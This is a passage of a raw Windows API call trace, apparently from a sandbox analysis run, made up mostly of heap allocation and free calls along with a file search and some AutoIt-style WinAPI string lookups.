dwReserved0=0x10100c0, dwReserved1=0x8, cFileName="aOtbGAAYxtk159gxW.xlsx", cAlternateFileName="AOTBGA~1.XLS")) returned 0x41ac2c0 [0075.766] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0075.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0075.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0075.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0075.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0075.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0075.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0075.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0075.766] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0075.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0075.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0075.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0075.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0075.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0075.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0075.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0075.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0075.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0075.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9de8 [0075.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0075.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0075.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0075.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0075.768] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0075.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0075.768] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0075.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0075.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0075.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0075.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0075.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0075.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0075.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0075.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0075.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0075.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0075.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0075.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0075.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0075.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0075.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0075.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0075.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0075.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0075.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0075.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0075.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0075.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0075.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0075.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0075.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0075.771] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0075.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0075.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0075.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0075.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0075.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0075.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0075.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0075.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0075.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0075.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0075.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0075.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0075.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0075.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0075.775] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0075.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0075.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0075.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 